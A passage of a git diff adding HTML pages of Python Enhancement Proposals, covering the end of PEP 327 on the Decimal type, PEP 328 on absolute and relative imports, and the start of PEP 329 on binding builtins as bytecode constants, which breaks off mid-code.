  • While theoretically nice, real world use cases for interactions between floats +and decimals are lacking. Java included float/decimal conversions to handle +an obscure case where calculations are best performed in decimal even though +a legacy data structure requires the inputs and outputs to be stored in +binary floating point.
  • +
  • If the need arises, users can use string representations as an intermediate +type. The advantage of this approach is that it makes explicit the +assumptions about precision and representation (no wondering what is going +on under the hood).
  • +
  • The Java docs for BigDecimal(double val) reflected their experiences with +the constructor:
    The results of this constructor can be somewhat
    +unpredictable and its use is generally not recommended.
    +
    +
    +
  • +
+
+
+

From tuples

+

Aahz suggested to construct from tuples: it’s easier +to implement eval()’s round trip and “someone who has numeric +values representing a Decimal does not need to convert them to a +string.”

+

The structure will be a tuple of three elements: sign, number and +exponent. The sign is 1 or 0, the number is a tuple of decimal digits +and the exponent is a signed int or long:

+
Decimal((1, (3, 2, 2, 5), -2))     # for -32.25
+
+
+

Of course, you can construct in this way all special values:

+
Decimal( (0, (0,), 'F') )          # for Infinity
+Decimal( (0, (0,), 'n') )          # for Not a Number
+
+
+
+
+

From Decimal

+

No mystery here, just a copy.

+
+
+

Syntax for All Cases

+
Decimal(value1)
+Decimal.from_float(value2, [decimal_places])
+
+
+

where value1 can be int, long, string, 3-tuple or Decimal, +value2 can only be float, and decimal_places is an optional +non negative int.

+
+
+

Creating from Context

+

This item arose in python-dev from two sources in parallel. Ka-Ping +Yee proposes to pass the context as an argument at instance creation +(he wants the context he passes to be used only in creation time: “It +would not be persistent”). Tony Meyer asks from_string to honor the +context if it receives a parameter “honour_context” with a True value. +(I don’t like it, because the doc specifies that the context be +honored and I don’t want the method to comply with the specification +regarding the value of an argument.)

+

Tim Peters gives us a reason to have a creation that uses context:

+
+
In general number-crunching, literals may be given to high +precision, but that precision isn’t free and usually isn’t +needed
+

Casey Duncan wants to use another method, not a bool arg:

+
+
I find boolean arguments a general anti-pattern, especially given +we have class methods. Why not use an alternate constructor like +Decimal.rounded_to_context(“3.14159265”).
+

In the process of deciding the syntax of that, Tim came up with a +better idea: he proposes not to have a method in Decimal to create +with a different context, but having instead a method in Context to +create a Decimal instance. Basically, instead of:

+
D.using_context(number, context)
+
+
+

it will be:

+
context.create_decimal(number)
+
+
+

From Tim:

+
+
While all operations in the spec except for the two to-string +operations use context, no operations in the spec support an +optional local context. That the Decimal() constructor ignores +context by default is an extension to the spec. We must supply a +context-honoring from-string operation to meet the spec. I +recommend against any concept of “local context” in any operation +– it complicates the model and isn’t necessary.
+

So, we decided to use a context method to create a Decimal that will +use (only to be created) that context in particular (for further +operations it will use the context of the thread). But, a method with +what name?

+

Tim Peters proposes three methods to create from diverse sources +(from_string, from_int, from_float). I proposed to use one method, +create_decimal(), without caring about the data type. Michael +Chermside: “The name just fits my brain. The fact that it uses the +context is obvious from the fact that it’s Context method”.

+

The community agreed with that. I think that it’s OK because a newbie +will not be using the creation method from Context (the separate +method in Decimal to construct from float is just to prevent newbies +from encountering binary floating point issues).

+

So, in short, if you want to create a Decimal instance using a +particular context (that will be used just at creation time and not +any further), you’ll have to use a method of that context:

+
# n is any datatype accepted in Decimal(n) plus float
+mycontext.create_decimal(n)
+
+
+

Example:

+
>>> # create a standard decimal instance
+>>> Decimal("11.2233445566778899")
+Decimal("11.2233445566778899")
+>>>
+>>> # create a decimal instance using the thread context
+>>> thread_context = getcontext()
+>>> thread_context.prec
+28
+>>> thread_context.create_decimal("11.2233445566778899")
+Decimal("11.2233445566778899")
+>>>
+>>> # create a decimal instance using other context
+>>> other_context = thread_context.copy()
+>>> other_context.prec = 4
+>>> other_context.create_decimal("11.2233445566778899")
+Decimal("11.22")
+
+
+
+
+
+

Implicit construction

+

As the implicit construction is the consequence of an operation, it +will be affected by the context as is detailed in each point.

+

John Roth suggested that “The other type should be handled in the same +way the decimal() constructor would handle it”. But Alex Martelli +thinks that

+
+
this total breach with Python tradition would be a terrible +mistake. 23+”43” is NOT handled in the same way as 23+int(“45”), +and a VERY good thing that is too. It’s a completely different +thing for a user to EXPLICITLY indicate they want construction +(conversion) and to just happen to sum two objects one of which by +mistake could be a string.
+

So, here I define the behaviour again for each data type.

+
+

From int or long

+

An int or long is a treated like a Decimal explicitly constructed from +Decimal(str(x)) in the current context (meaning that the to-string rules +for rounding are applied and the appropriate flags are set). This +guarantees that expressions like Decimal('1234567') + 13579 match +the mental model of Decimal('1234567') + Decimal('13579'). That +model works because all integers are representable as strings without +representation error.

+
+
+

From string

+

Everybody agrees to raise an exception here.

+
+
+

From float

+

Aahz is strongly opposed to interact with float, suggesting an +explicit conversion:

+
+
The problem is that Decimal is capable of greater precision, +accuracy, and range than float.
+

The example of the valid python expression, 35 + 1.1, seems to suggest +that Decimal(35) + 1.1 should also be valid. However, a closer look +shows that it only demonstrates the feasibility of integer to floating +point conversions. Hence, the correct analog for decimal floating point +is 35 + Decimal(1.1). Both coercions, int-to-float and int-to-Decimal, +can be done without incurring representation error.

+

The question of how to coerce between binary and decimal floating point +is more complex. I proposed allowing the interaction with float, +making an exact conversion and raising ValueError if exceeds the +precision in the current context (this is maybe too tricky, because +for example with a precision of 9, Decimal(35) + 1.2 is OK but +Decimal(35) + 1.1 raises an error).

+

This resulted to be too tricky. So tricky, that c.l.p agreed to raise +TypeError in this case: you could not mix Decimal and float.

+
+
+

From Decimal

+

There isn’t any issue here.

+
+
+
+

Use of Context

+

In the last pre-PEP I said that “The Context must be omnipresent, +meaning that changes to it affects all the current and future Decimal +instances”. I was wrong. In response, John Roth said:

+
+
The context should be selectable for the particular usage. That +is, it should be possible to have several different contexts in +play at one time in an application.
+

In comp.lang.python, Aahz explained that the idea is to have a +“context per thread”. So, all the instances of a thread belongs to a +context, and you can change a context in thread A (and the behaviour +of the instances of that thread) without changing nothing in thread B.

+

Also, and again correcting me, he said:

+
+
(the) Context applies only to operations, not to Decimal +instances; changing the Context does not affect existing instances +if there are no operations on them.
+

Arguing about special cases when there’s need to perform operations +with other rules that those of the current context, Tim Peters said +that the context will have the operations as methods. This way, the +user “can create whatever private context object(s) it needs, and +spell arithmetic as explicit method calls on its private context +object(s), so that the default thread context object is neither +consulted nor modified”.

+
+
+

Python Usability

+
    +
  • Decimal should support the basic arithmetic (+, -, *, /, //, **, +%, divmod) and comparison (==, !=, <, >, <=, >=, cmp) +operators in the following cases (check Implicit Construction to +see what types could OtherType be, and what happens in each case):
      +
    • Decimal op Decimal
    • +
    • Decimal op otherType
    • +
    • otherType op Decimal
    • +
    • Decimal op= Decimal
    • +
    • Decimal op= otherType
    • +
    +
  • +
  • Decimal should support unary operators (-, +, abs).
  • +
  • repr() should round trip, meaning that:
    m = Decimal(...)
    +m == eval(repr(m))
    +
    +
    +
  • +
  • Decimal should be immutable.
  • +
  • Decimal should support the built-in methods:
      +
    • min, max
    • +
    • float, int, long
    • +
    • str, repr
    • +
    • hash
    • +
    • bool (0 is false, otherwise true)
    • +
    +
  • +
+

There’s been some discussion in python-dev about the behaviour of +hash(). The community agrees that if the values are the same, the +hashes of those values should also be the same. So, while Decimal(25) +== 25 is True, hash(Decimal(25)) should be equal to hash(25).

+

The detail is that you can NOT compare Decimal to floats or strings, +so we should not worry about them giving the same hashes. In short:

+
hash(n) == hash(Decimal(n))   # Only if n is int, long, or Decimal
+
+
+

Regarding str() and repr() behaviour, Ka-Ping Yee proposes that repr() +have the same behaviour as str() and Tim Peters proposes that str() +behave like the to-scientific-string operation from the Spec.

+

This is possible, because (from Aahz): “The string form already +contains all the necessary information to reconstruct a Decimal +object”.

+

And it also complies with the Spec; Tim Peters:

+
+
There’s no requirement to have a method named “to_sci_string”, +the only requirement is that some way to spell to-sci-string’s +functionality be supplied. The meaning of to-sci-string is +precisely specified by the standard, and is a good choice for both +str(Decimal) and repr(Decimal).
+
+
+
+

Documentation

+

This section explains all the public methods and attributes of Decimal +and Context.

+
+

Decimal Attributes

+

Decimal has no public attributes. The internal information is stored +in slots and should not be accessed by end users.

+
+
+

Decimal Methods

+

Following are the conversion and arithmetic operations defined in the +Spec, and how that functionality can be achieved with the actual +implementation.

+
    +
  • to-scientific-string: Use builtin function str():
    >>> d = Decimal('123456789012.345')
    +>>> str(d)
    +'1.23456789E+11'
    +
    +
    +
  • +
  • to-engineering-string: Use method to_eng_string():
    >>> d = Decimal('123456789012.345')
    +>>> d.to_eng_string()
    +'123.456789E+9'
    +
    +
    +
  • +
  • to-number: Use Context method create_decimal(). The standard +constructor or from_float() constructor cannot be used because +these do not use the context (as is specified in the Spec for this +conversion).
  • +
  • abs: Use builtin function abs():
    >>> d = Decimal('-15.67')
    +>>> abs(d)
    +Decimal('15.67')
    +
    +
    +
  • +
  • add: Use operator +:
    >>> d = Decimal('15.6')
    +>>> d + 8
    +Decimal('23.6')
    +
    +
    +
  • +
  • subtract: Use operator -:
    >>> d = Decimal('15.6')
    +>>> d - 8
    +Decimal('7.6')
    +
    +
    +
  • +
  • compare: Use method compare(). This method (and not the +built-in function cmp()) should only be used when dealing with +special values:
    >>> d = Decimal('-15.67')
    +>>> nan = Decimal('NaN')
    +>>> d.compare(23)
    +'-1'
    +>>> d.compare(nan)
    +'NaN'
    +>>> cmp(d, 23)
    +-1
    +>>> cmp(d, nan)
    +1
    +
    +
    +
  • +
  • divide: Use operator /:
    >>> d = Decimal('-15.67')
    +>>> d / 2
    +Decimal('-7.835')
    +
    +
    +
  • +
  • divide-integer: Use operator //:
    >>> d = Decimal('-15.67')
    +>>> d // 2
    +Decimal('-7')
    +
    +
    +
  • +
  • max: Use method max(). Only use this method (and not the +built-in function max()) when dealing with special values:
    >>> d = Decimal('15')
    +>>> nan = Decimal('NaN')
    +>>> d.max(8)
    +Decimal('15')
    +>>> d.max(nan)
    +Decimal('NaN')
    +
    +
    +
  • +
  • min: Use method min(). Only use this method (and not the +built-in function min()) when dealing with special values:
    >>> d = Decimal('15')
    +>>> nan = Decimal('NaN')
    +>>> d.min(8)
    +Decimal('8')
    +>>> d.min(nan)
    +Decimal('NaN')
    +
    +
    +
  • +
  • minus: Use unary operator -:
    >>> d = Decimal('-15.67')
    +>>> -d
    +Decimal('15.67')
    +
    +
    +
  • +
  • plus: Use unary operator +:
    >>> d = Decimal('-15.67')
    +>>> +d
    +Decimal('-15.67')
    +
    +
    +
  • +
  • multiply: Use operator *:
    >>> d = Decimal('5.7')
    +>>> d * 3
    +Decimal('17.1')
    +
    +
    +
  • +
  • normalize: Use method normalize():
    >>> d = Decimal('123.45000')
    +>>> d.normalize()
    +Decimal('123.45')
    +>>> d = Decimal('120.00')
    +>>> d.normalize()
    +Decimal('1.2E+2')
    +
    +
    +
  • +
  • quantize: Use method quantize():
    >>> d = Decimal('2.17')
    +>>> d.quantize(Decimal('0.001'))
    +Decimal('2.170')
    +>>> d.quantize(Decimal('0.1'))
    +Decimal('2.2')
    +
    +
    +
  • +
  • remainder: Use operator %:
    >>> d = Decimal('10')
    +>>> d % 3
    +Decimal('1')
    +>>> d % 6
    +Decimal('4')
    +
    +
    +
  • +
  • remainder-near: Use method remainder_near():
    >>> d = Decimal('10')
    +>>> d.remainder_near(3)
    +Decimal('1')
    +>>> d.remainder_near(6)
    +Decimal('-2')
    +
    +
    +
  • +
  • round-to-integral-value: Use method to_integral():
    >>> d = Decimal('-123.456')
    +>>> d.to_integral()
    +Decimal('-123')
    +
    +
    +
  • +
  • same-quantum: Use method same_quantum():
    >>> d = Decimal('123.456')
    +>>> d.same_quantum(Decimal('0.001'))
    +True
    +>>> d.same_quantum(Decimal('0.01'))
    +False
    +
    +
    +
  • +
  • square-root: Use method sqrt():
    >>> d = Decimal('123.456')
    +>>> d.sqrt()
    +Decimal('11.1110756')
    +
    +
    +
  • +
  • power: User operator **:
    >>> d = Decimal('12.56')
    +>>> d ** 2
    +Decimal('157.7536')
    +
    +
    +
  • +
+

Following are other methods and why they exist:

+
    +
  • adjusted(): Returns the adjusted exponent. This concept is +defined in the Spec: the adjusted exponent is the value of the +exponent of a number when that number is expressed as though in +scientific notation with one digit before any decimal point:
    >>> d = Decimal('12.56')
    +>>> d.adjusted()
    +1
    +
    +
    +
  • +
  • from_float(): Class method to create instances from float data +types:
    >>> d = Decimal.from_float(12.35)
    +>>> d
    +Decimal('12.3500000')
    +
    +
    +
  • +
  • as_tuple(): Show the internal structure of the Decimal, the +triple tuple. This method is not required by the Spec, but Tim +Peters proposed it and the community agreed to have it (it’s useful +for developing and debugging):
    >>> d = Decimal('123.4')
    +>>> d.as_tuple()
    +(0, (1, 2, 3, 4), -1)
    +>>> d = Decimal('-2.34e5')
    +>>> d.as_tuple()
    +(1, (2, 3, 4), 3)
    +
    +
    +
  • +
+
+
+

Context Attributes

+

These are the attributes that can be changed to modify the context.

+
    +
  • prec (int): the precision:
    >>> c.prec
    +9
    +
    +
    +
  • +
  • rounding (str): rounding type (how to round):
    >>> c.rounding
    +'half_even'
    +
    +
    +
  • +
  • trap_enablers (dict): if trap_enablers[exception] = 1, then an +exception is raised when it is caused:
    >>> c.trap_enablers[Underflow]
    +0
    +>>> c.trap_enablers[Clamped]
    +0
    +
    +
    +
  • +
  • flags (dict): when an exception is caused, flags[exception] is +incremented (whether or not the trap_enabler is set). Should be +reset by the user of Decimal instance:
    >>> c.flags[Underflow]
    +0
    +>>> c.flags[Clamped]
    +0
    +
    +
    +
  • +
  • Emin (int): minimum exponent:
    >>> c.Emin
    +-999999999
    +
    +
    +
  • +
  • Emax (int): maximum exponent:
    >>> c.Emax
    +999999999
    +
    +
    +
  • +
  • capitals (int): boolean flag to use ‘E’ (True/1) or ‘e’ +(False/0) in the string (for example, ‘1.32e+2’ or ‘1.32E+2’):
    >>> c.capitals
    +1
    +
    +
    +
  • +
+
+
+

Context Methods

+

The following methods comply with Decimal functionality from the Spec. +Be aware that the operations that are called through a specific +context use that context and not the thread context.

+

To use these methods, take note that the syntax changes when the +operator is binary or unary, for example:

+
>>> mycontext.abs(Decimal('-2'))
+'2'
+>>> mycontext.multiply(Decimal('2.3'), 5)
+'11.5'
+
+
+

So, the following are the Spec operations and conversions and how to +achieve them through a context (where d is a Decimal instance and +n a number that can be used in an Implicit construction):

+
    +
  • to-scientific-string: to_sci_string(d)
  • +
  • to-engineering-string: to_eng_string(d)
  • +
  • to-number: create_decimal(number), see Explicit construction +for number.
  • +
  • abs: abs(d)
  • +
  • add: add(d, n)
  • +
  • subtract: subtract(d, n)
  • +
  • compare: compare(d, n)
  • +
  • divide: divide(d, n)
  • +
  • divide-integer: divide_int(d, n)
  • +
  • max: max(d, n)
  • +
  • min: min(d, n)
  • +
  • minus: minus(d)
  • +
  • plus: plus(d)
  • +
  • multiply: multiply(d, n)
  • +
  • normalize: normalize(d)
  • +
  • quantize: quantize(d, d)
  • +
  • remainder: remainder(d)
  • +
  • remainder-near: remainder_near(d)
  • +
  • round-to-integral-value: to_integral(d)
  • +
  • same-quantum: same_quantum(d, d)
  • +
  • square-root: sqrt(d)
  • +
  • power: power(d, n)
  • +
+

The divmod(d, n) method supports decimal functionality through +Context.

+

These are methods that return useful information from the Context:

+
    +
  • Etiny(): Minimum exponent considering precision.
    >>> c.Emin
    +-999999999
    +>>> c.Etiny()
    +-1000000007
    +
    +
    +
  • +
  • Etop(): Maximum exponent considering precision.
    >>> c.Emax
    +999999999
    +>>> c.Etop()
    +999999991
    +
    +
    +
  • +
  • copy(): Returns a copy of the context.
  • +
+
+
+
+

Reference Implementation

+

As of Python 2.4-alpha, the code has been checked into the standard +library. The latest version is available from:

+

http://svn.python.org/view/python/trunk/Lib/decimal.py

+

The test cases are here:

+

http://svn.python.org/view/python/trunk/Lib/test/test_decimal.py

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0327.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0328/index.html b/pep-0328/index.html new file mode 100644 index 00000000000..e3f30aed8c4 --- /dev/null +++ b/pep-0328/index.html @@ -0,0 +1,423 @@ + + + + + + + + PEP 328 – Imports: Multi-Line and Absolute/Relative | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 328 – Imports: Multi-Line and Absolute/Relative

+
+
Author:
+
Aahz <aahz at pythoncraft.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Dec-2003
+
Python-Version:
+
2.4, 2.5, 2.6
+
Post-History:
+
08-Mar-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

The import statement has two problems:

+
    +
  • Long import statements can be difficult to write, requiring +various contortions to fit Pythonic style guidelines.
  • +
  • Imports can be ambiguous in the face of packages; within a package, +it’s not clear whether import foo refers to a module within the +package or some module outside the package. (More precisely, a local +module or package can shadow another hanging directly off +sys.path.)
  • +
+

For the first problem, it is proposed that parentheses be permitted to +enclose multiple names, thus allowing Python’s standard mechanisms for +multi-line values to apply. For the second problem, it is proposed that +all import statements be absolute by default (searching sys.path +only) with special syntax (leading dots) for accessing package-relative +imports.

+
+
+

Timeline

+

In Python 2.5, you must enable the new absolute import behavior with

+
from __future__ import absolute_import
+
+
+

You may use relative imports freely. In Python 2.6, any import +statement that results in an intra-package import will raise +DeprecationWarning (this also applies to from <> import that +fails to use the relative import syntax).

+
+
+

Rationale for Parentheses

+

Currently, if you want to import a lot of names from a module or +package, you have to choose one of several unpalatable options:

+
    +
  • Write a long line with backslash continuations:
    from Tkinter import Tk, Frame, Button, Entry, Canvas, Text, \
    +    LEFT, DISABLED, NORMAL, RIDGE, END
    +
    +
    +
  • +
  • Write multiple import statements:
    from Tkinter import Tk, Frame, Button, Entry, Canvas, Text
    +from Tkinter import LEFT, DISABLED, NORMAL, RIDGE, END
    +
    +
    +
  • +
+

(import * is not an option ;-)

+

Instead, it should be possible to use Python’s standard grouping +mechanism (parentheses) to write the import statement:

+
from Tkinter import (Tk, Frame, Button, Entry, Canvas, Text,
+    LEFT, DISABLED, NORMAL, RIDGE, END)
+
+
+

This part of the proposal had BDFL approval from the beginning.

+

Parentheses support was added to Python 2.4.

+
+
+

Rationale for Absolute Imports

+

In Python 2.4 and earlier, if you’re reading a module located inside a +package, it is not clear whether

+
import foo
+
+
+

refers to a top-level module or to another module inside the package. +As Python’s library expands, more and more existing package internal +modules suddenly shadow standard library modules by accident. It’s a +particularly difficult problem inside packages because there’s no way to +specify which module is meant. To resolve the ambiguity, it is proposed +that foo will always be a module or package reachable from +sys.path. This is called an absolute import.

+

The python-dev community chose absolute imports as the default because +they’re the more common use case and because absolute imports can provide +all the functionality of relative (intra-package) imports – albeit at +the cost of difficulty when renaming package pieces higher up in the +hierarchy or when moving one package inside another.

+

Because this represents a change in semantics, absolute imports will +be optional in Python 2.5 and 2.6 through the use of

+
from __future__ import absolute_import
+
+
+

This part of the proposal had BDFL approval from the beginning.

+
+
+

Rationale for Relative Imports

+

With the shift to absolute imports, the question arose whether +relative imports should be allowed at all. Several use cases were +presented, the most important of which is being able to rearrange the +structure of large packages without having to edit sub-packages. In +addition, a module inside a package can’t easily import itself without +relative imports.

+

Guido approved of the idea of relative imports, but there has been a +lot of disagreement on the spelling (syntax). There does seem to be +agreement that relative imports will require listing specific names to +import (that is, import foo as a bare term will always be an +absolute import).

+

Here are the contenders:

+
    +
  • One from Guido:
    from .foo import bar
    +
    +
    +

    and

    +
    from ...foo import bar
    +
    +
    +

    These two forms have a couple of different suggested semantics. One +semantic is to make each dot represent one level. There have been +many complaints about the difficulty of counting dots. Another +option is to only allow one level of relative import. That misses a +lot of functionality, and people still complained about missing the +dot in the one-dot form. The final option is to define an algorithm +for finding relative modules and packages; the objection here is +“Explicit is better than implicit”. (The algorithm proposed is +“search up from current package directory until the ultimate package +parent gets hit”.)

    +

    Some people have suggested other punctuation as the separator, such +as “-” or “^”.

    +

    Some people have suggested using “*”:

    +
    from *.foo import bar
    +
    +
    +
  • +
  • The next set of options is conflated from several posters:
    from __pkg__.__pkg__ import
    +
    +
    +

    and

    +
    from .__parent__.__parent__ import
    +
    +
    +

    Many people (Guido included) think these look ugly, but they are +clear and explicit. Overall, more people prefer __pkg__ as the +shorter option.

    +
  • +
  • One suggestion was to allow only sibling references. In other words, +you would not be able to use relative imports to refer to modules +higher in the package tree. You would then be able to do either
    from .spam import eggs
    +
    +
    +

    or

    +
    import .spam.eggs
    +
    +
    +
  • +
  • Some people favor allowing indexed parents:
    from -2.spam import eggs
    +
    +
    +

    In this scenario, importing from the current directory would be a +simple

    +
    from .spam import eggs
    +
    +
    +
  • +
  • Finally, some people dislike the way you have to change import +to from ... import when you want to dig inside a package. They +suggest completely rewriting the import syntax:
    from MODULE import NAMES as RENAME searching HOW
    +
    +
    +

    or

    +
    import NAMES as RENAME from MODULE searching HOW
    +    [from NAMES] [in WHERE] import ...
    +
    +
    +

    However, this most likely could not be implemented for Python 2.5 +(too big a change), and allowing relative imports is sufficiently +critical that we need something now (given that the standard +import will change to absolute import). More than that, this +proposed syntax has several open questions:

    +
      +
    • What is the precise proposed syntax? (Which clauses are optional +under which circumstances?)
    • +
    • How strongly does the searching clause bind? In other words, +do you write:
      import foo as bar searching XXX, spam as ham searching XXX
      +
      +
      +

      or:

      +
      import foo as bar, spam as ham searching XXX
      +
      +
      +
    • +
    +
  • +
+
+
+

Guido’s Decision

+

Guido has Pronounced [1] that relative imports will use leading dots. +A single leading dot indicates a relative import, starting with the +current package. Two or more leading dots give a relative import to the +parent(s) of the current package, one level per dot after the first. +Here’s a sample package layout:

+
package/
+    __init__.py
+    subpackage1/
+        __init__.py
+        moduleX.py
+        moduleY.py
+    subpackage2/
+        __init__.py
+        moduleZ.py
+    moduleA.py
+
+
+

Assuming that the current file is either moduleX.py or +subpackage1/__init__.py, following are correct usages of the new +syntax:

+
from .moduleY import spam
+from .moduleY import spam as ham
+from . import moduleY
+from ..subpackage1 import moduleY
+from ..subpackage2.moduleZ import eggs
+from ..moduleA import foo
+from ...package import bar
+from ...sys import path
+
+
+

Note that while that last case is legal, it is certainly discouraged +(“insane” was the word Guido used).

+

Relative imports must always use from <> import; import <> is +always absolute. Of course, absolute imports can use from <> import +by omitting the leading dots. The reason import .foo is prohibited +is because after

+
import XXX.YYY.ZZZ
+
+
+

then

+
XXX.YYY.ZZZ
+
+
+

is usable in an expression. But

+
.moduleY
+
+
+

is not usable in an expression.

+
+
+

Relative Imports and __name__

+

Relative imports use a module’s __name__ attribute to determine that +module’s position in the package hierarchy. If the module’s name does +not contain any package information (e.g. it is set to ‘__main__’) +then relative imports are resolved as if the module were a top level +module, regardless of where the module is actually located on the file +system.

+
+
+

Relative Imports and Indirection Entries in sys.modules

+

When packages were introduced, the concept of an indirection entry in +sys.modules came into existence [2]. When an entry in sys.modules +for a module within a package had a value of None, it represented that +the module actually referenced the top-level module. For instance, +‘Sound.Effects.string’ might have a value of None in sys.modules. +That meant any import that resolved to that name actually was to +import the top-level ‘string’ module.

+

This introduced an optimization for when a relative import was meant +to resolve to an absolute import. But since this PEP makes a very +clear delineation between absolute and relative imports, this +optimization is no longer needed. When absolute/relative imports +become the only import semantics available then indirection entries in +sys.modules will no longer be supported.

+
+
+

References

+

For more background, see the following python-dev threads:

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0328.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0329/index.html b/pep-0329/index.html new file mode 100644 index 00000000000..a3c1558f71c --- /dev/null +++ b/pep-0329/index.html @@ -0,0 +1,358 @@ + + + + + + + + PEP 329 – Treating Builtins as Constants in the Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 329 – Treating Builtins as Constants in the Standard Library

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Apr-2004
+
Python-Version:
+
2.4
+
Post-History:
+
18-Apr-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

The proposal is to add a function for treating builtin references as +constants and to apply that function throughout the standard library.

+
+
+

Status

+

The PEP is self rejected by the author. Though the ASPN recipe was +well received, there was less willingness to consider this for +inclusion in the core distribution.

+

The Jython implementation does not use byte codes, so its performance +would suffer if the current _len=len optimizations were removed.

+

Also, altering byte codes is one of the least clean ways to improve +performance and enable cleaner coding. A more robust solution would +likely involve compiler pragma directives or metavariables indicating +what can be optimized (similar to const/volatile declarations).

+
+
+

Motivation

+

The library contains code such as _len=len which is intended to +create fast local references instead of slower global lookups. Though +necessary for performance, these constructs clutter the code and are +usually incomplete (missing many opportunities).

+

If the proposal is adopted, those constructs could be eliminated from +the code base and at the same time improve upon their results in terms +of performance.

+

There are currently over a hundred instances of while 1 in the +library. They were not replaced with the more readable while True +because of performance reasons (the compiler cannot eliminate the test +because True is not known to always be a constant). Conversion of +True to a constant will clarify the code while retaining performance.

+

Many other basic Python operations run much slower because of global +lookups. In try/except statements, the trapped exceptions are +dynamically looked up before testing whether they match. +Similarly, simple identity tests such as while x is not None +require the None variable to be re-looked up on every pass. +Builtin lookups are especially egregious because the enclosing global +scope must be checked first. These lookup chains devour cache space +that is best used elsewhere.

+

In short, if the proposal is adopted, the code will become cleaner +and performance will improve across the board.

+
+
+

Proposal

+

Add a module called codetweaks.py which contains two functions, +bind_constants() and bind_all(). The first function performs +constant binding and the second recursively applies it to every +function and class in a target module.

+

For most modules in the standard library, add a pair of lines near +the end of the script:

+
import codetweaks, sys
+codetweaks.bind_all(sys.modules[__name__])
+
+
+

In addition to binding builtins, there are some modules (like +sre_compile) where it also makes sense to bind module variables +as well as builtins into constants.

+
+
+

Questions and Answers

+
    +
  1. Will this make everyone divert their attention to optimization +issues?

    Because it is done automatically, it reduces the need to think +about optimizations.

    +
  2. +
  3. In a nutshell, how does it work?

    Every function has attributes with its bytecodes (the language of +the Python virtual machine) and a table of constants. The bind +function scans the bytecodes for a LOAD_GLOBAL instruction and +checks to see whether the value is already known. If so, it adds +that value to the constants table and replaces the opcode with +LOAD_CONSTANT.

    +
  4. +
  5. When does it work?

    When a module is imported for the first time, python compiles the +bytecode and runs the binding optimization. Subsequent imports +just re-use the previous work. Each session repeats this process +(the results are not saved in pyc files).

    +
  6. +
  7. How do you know this works?

    I implemented it, applied it to every module in library, and the test +suite ran without exception.

    +
  8. +
  9. What if the module defines a variable shadowing a builtin?

    This does happen. For instance, True can be redefined at the module +level as True = (1==1). The sample implementation below detects the +shadowing and leaves the global lookup unchanged.

    +
  10. +
  11. Are you the first person to recognize that most global lookups are for +values that never change?

    No, this has long been known. Skip Montanaro provides an eloquent +explanation in PEP 266.

    +
  12. +
  13. What if I want to replace the builtins module and supply my own +implementations?

    Either do this before importing a module, or just reload the +module, or disable codetweaks.py (it will have a disable flag).

    +
  14. +
  15. How susceptible is this module to changes in Python’s byte coding?

    It imports opcode.py to protect against renumbering. Also, it +uses LOAD_CONST and LOAD_GLOBAL which are fundamental and have +been around forever. That notwithstanding, the coding scheme could +change and this implementation would have to change along with +modules like dis which also rely on the current coding scheme.

    +
  16. +
  17. What is the effect on startup time?

    I could not measure a difference. None of the startup modules are +bound except for warnings.py. Also, the binding function is very +fast, making just a single pass over the code string in search of +the LOAD_GLOBAL opcode.

    +
  18. +
+
+
+

Sample Implementation

+

Here is a sample implementation for codetweaks.py:

+
from types import ClassType, FunctionType
+from opcode import opmap, HAVE_ARGUMENT, EXTENDED_ARG
+LOAD_GLOBAL, LOAD_CONST = opmap['LOAD_GLOBAL'], opmap['LOAD_CONST']
+ABORT_CODES = (EXTENDED_ARG, opmap['STORE_GLOBAL'])
+
+def bind_constants(f, builtin_only=False, stoplist=[], verbose=False):
+    """ Return a new function with optimized global references.
+
+    Replaces global references with their currently defined values.
+    If not defined, the dynamic (runtime) global lookup is left undisturbed.
+    If builtin_only is True, then only builtins are optimized.
+    Variable names in the stoplist are also left undisturbed.
+    If verbose is True, prints each substitution as is occurs.
+
+    """
+    import __builtin__
+    env = vars(__builtin__).copy()
+    stoplist = dict.fromkeys(stoplist)
+    if builtin_only:
+        stoplist.update(f.func_globals)
+    else:
+        env.update(f.func_globals)
+
+    co = f.func_code
+    newcode = map(ord, co.co_code)
+    newconsts = list(co.co_consts)
+    codelen = len(newcode)
+
+    i = 0
+    while i < codelen:
+        opcode = newcode[i]
+        if opcode in ABORT_CODES:
+            return f    # for simplicity, only optimize common cases
+        if opcode == LOAD_GLOBAL:
+            oparg = newcode[i+1] + (newcode[i+2] << 8)
+            name = co.co_names[oparg]
+            if name in env and name not in stoplist:
+                value = env[name]
+                try:
+                    pos = newconsts.index(value)
+                except ValueError:
+                    pos = len(newconsts)
+                    newconsts.append(value)
+                newcode[i] = LOAD_CONST
+                newcode[i+1] = pos & 0xFF
+                newcode[i+2] = pos >> 8
+                if verbose:
+                    print name, '-->', value
+        i += 1
+        if opcode >= HAVE_ARGUMENT:
+            i += 2
+
+    codestr = ''.join(map(chr, newcode))
+    codeobj = type(co)(co.co_argcount, co.co_nlocals, co.co_stacksize,
+                    co.co_flags, codestr, tuple(newconsts), co.co_names,
+                    co.co_varnames, co.co_filename, co.co_name,
+                    co.co_firstlineno, co.co_lnotab, co.co_freevars,
+                    co.co_cellvars)
+    return type(f)(codeobj, f.func_globals, f.func_name, f.func_defaults,
+                    f.func_closure)
+
+
+def bind_all(mc, builtin_only=False, stoplist=[], verbose=False):
+    """Recursively apply bind_constants() to functions in a module or class.
+
+    Use as the last line of the module (after everything is defined, but
+    before test code).
+
+    In modules that need modifiable globals, set builtin_only to True.
+
+    """
